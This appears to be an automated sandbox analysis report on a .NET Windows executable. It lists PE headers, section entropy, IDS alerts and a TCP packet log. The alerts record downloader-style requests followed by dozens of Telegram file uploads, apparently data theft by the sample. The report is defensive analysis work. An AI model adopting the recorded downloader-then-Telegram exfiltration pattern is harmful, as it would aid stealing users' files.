                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            push ebx
                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                            jnc 00007F7E5C8337C2h
                                                                                                            je 00007F7E5C8337C2h
                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                            add byte ptr [ecx+00h], al
                                                                                                            arpl word ptr [eax], ax
                                                                                                            je 00007F7E5C8337C2h
                                                                                                            imul eax, dword ptr [eax], 00610076h
                                                                                                            je 00007F7E5C8337C2h
                                                                                                            outsd
                                                                                                            add byte ptr [edx+00h], dh
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd4af50x4f.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd60000x5cc.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xd24fc0x70.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xd2b700xd2c00a9800489c210e624a225f9ed79542f07False0.8345856038701067data7.615593459072145IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xd60000x5cc0x6006a722d37ddd92c77dee1d52a3fd7c37aFalse0.4270833333333333data4.1256364909387795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xd80000xc0x2009ebc8b00de2231a5d4f81f25aead7cfcFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_VERSION0xd60900x33cdata0.4311594202898551
                                                                                                            RT_MANIFEST0xd63dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-10T23:06:24.708171+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749732193.122.6.16880TCP
                                                                                                            2025-01-10T23:06:25.833163+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749732193.122.6.16880TCP
                                                                                                            2025-01-10T23:06:26.398364+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749751104.21.112.1443TCP
                                                                                                            2025-01-10T23:06:27.098861+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749757193.122.6.16880TCP
                                                                                                            2025-01-10T23:06:29.105641+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749773104.21.112.1443TCP
                                                                                                            2025-01-10T23:06:34.333208+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749815104.21.112.1443TCP
                                                                                                            2025-01-10T23:06:36.689951+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749834149.154.167.220443TCP
                                                                                                            2025-01-10T23:06:44.285053+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749884149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:06.926915+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749995149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:07.863530+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749996149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:08.804424+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749997149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:09.780103+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749998149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:10.733606+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749999149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:11.643892+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750000149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:15.656959+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750001149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:16.578900+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750002149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:17.488276+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750004149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:18.467441+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750005149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:19.405961+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750006149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:23.344119+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750007149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:24.333296+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750008149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:25.219888+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750009149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:26.177148+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750010149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:27.078510+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750011149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:31.059922+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750012149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:32.005003+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750013149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:33.053240+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750014149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:34.160472+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750015149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:35.171257+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750016149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:36.249133+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750017149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:45.402268+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750018149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:46.349426+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750019149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:47.301327+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750020149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:48.309609+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750021149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:49.232355+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750022149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:53.256177+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750023149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:54.273003+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750024149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:55.390529+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750025149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:56.302892+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750026149.154.167.220443TCP
                                                                                                            2025-01-10T23:07:57.214769+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750027149.154.167.220443TCP
                                                                                                            2025-01-10T23:08:01.186194+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750028149.154.167.220443TCP
                                                                                                            2025-01-10T23:08:02.259667+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750029149.154.167.220443TCP
                                                                                                            2025-01-10T23:08:03.211107+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750030149.154.167.220443TCP
                                                                                                            2025-01-10T23:08:04.158685+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750031149.154.167.220443TCP
                                                                                                            2025-01-10T23:08:05.117022+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750032149.154.167.220443TCP
                                                                                                            2025-01-10T23:08:09.074400+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750033149.154.167.220443TCP
                                                                                                            2025-01-10T23:08:10.116286+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750034149.154.167.220443TCP
                                                                                                            2025-01-10T23:08:11.189173+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750035149.154.167.220443TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 23:06:23.169557095 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:23.174401999 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:23.174474955 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:23.174691916 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:23.179478884 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:24.460573912 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:24.464193106 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:24.469083071 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:24.663239956 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:24.708170891 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:24.713129044 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:24.713186026 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:24.713238001 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:24.721110106 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:24.721143007 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.211209059 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.211289883 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.216384888 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.216399908 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.216737986 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.270652056 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.272644997 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.319325924 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.415642977 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.415704012 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.415757895 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.592042923 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.595396996 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:25.600276947 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.783324957 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.786412001 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.786447048 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.786604881 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.786948919 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.786961079 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.833163023 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.261480093 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.263972998 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:26.263991117 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.398332119 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.398408890 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.398761034 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:26.399075031 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:26.402914047 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.404196978 CET4975780192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.407985926 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.408045053 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.408979893 CET8049757193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.409053087 CET4975780192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.409161091 CET4975780192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.413870096 CET8049757193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.053514004 CET8049757193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.054974079 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.055012941 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.055084944 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.055355072 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.055371046 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.098860979 CET4975780192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:27.532980919 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.534606934 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.534643888 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.662179947 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.662240028 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.662481070 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.662956953 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.667114019 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:27.671890020 CET8049770193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.671962023 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:27.672051907 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:27.677297115 CET8049770193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.323019028 CET8049770193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.324186087 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:28.324225903 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.324297905 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:28.324549913 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:28.324562073 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.364428997 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:28.801151991 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.810631037 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:28.810661077 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.105664968 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.105732918 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.105818033 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.164027929 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.205835104 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.210916042 CET8049770193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.210973978 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.238604069 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.243618965 CET8049779193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.243684053 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.243932009 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.248704910 CET8049779193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.871208906 CET8049779193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.872647047 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.872684956 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.872741938 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.873191118 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.873200893 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.911324978 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.327202082 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.329027891 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:30.329044104 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.460563898 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.460658073 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.460700989 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:30.461622953 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:30.466119051 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.467905045 CET4979080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.471107960 CET8049779193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.471494913 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.472759008 CET8049790193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.472826004 CET4979080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.472919941 CET4979080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.477659941 CET8049790193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.113214970 CET8049790193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.114808083 CET49796443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:31.114849091 CET44349796104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.114984035 CET49796443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:31.115247965 CET49796443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:31.115266085 CET44349796104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.162708998 CET4979080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:31.570713043 CET44349796104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.573847055 CET49796443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:31.573877096 CET44349796104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.726391077 CET44349796104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.736336946 CET44349796104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.737183094 CET49796443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:31.738481045 CET49796443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:31.838177919 CET4979080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:31.839055061 CET4980180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:31.843266964 CET8049790193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.843892097 CET8049801193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:31.843971014 CET4979080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:31.844114065 CET4980180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:31.844506979 CET4980180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:31.849349022 CET8049801193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:32.475076914 CET8049801193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:32.476440907 CET49807443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:32.476500034 CET44349807104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:32.476572037 CET49807443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:32.476845026 CET49807443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:32.476860046 CET44349807104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:32.520695925 CET4980180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:32.934484005 CET44349807104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:32.936213017 CET49807443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:32.936269045 CET44349807104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.097641945 CET44349807104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.097711086 CET44349807104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.097762108 CET49807443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:33.098160982 CET49807443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:33.101361036 CET4980180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:33.102448940 CET4981180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:33.106338024 CET8049801193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.106409073 CET4980180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:33.107274055 CET8049811193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.107337952 CET4981180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:33.107426882 CET4981180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:33.112186909 CET8049811193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.734648943 CET8049811193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.735898972 CET49815443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:33.735955954 CET44349815104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.736042976 CET49815443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:33.736252069 CET49815443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:33.736263990 CET44349815104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:33.786362886 CET4981180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:34.198936939 CET44349815104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:34.200562954 CET49815443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:34.200627089 CET44349815104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:34.333233118 CET44349815104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:34.333298922 CET44349815104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:34.333446026 CET49815443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:34.333940983 CET49815443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:34.337049961 CET4981180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:34.337804079 CET4982180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:34.342052937 CET8049811193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:34.342251062 CET4981180192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:34.342664957 CET8049821193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:34.342753887 CET4982180192.168.2.7193.122.6.168
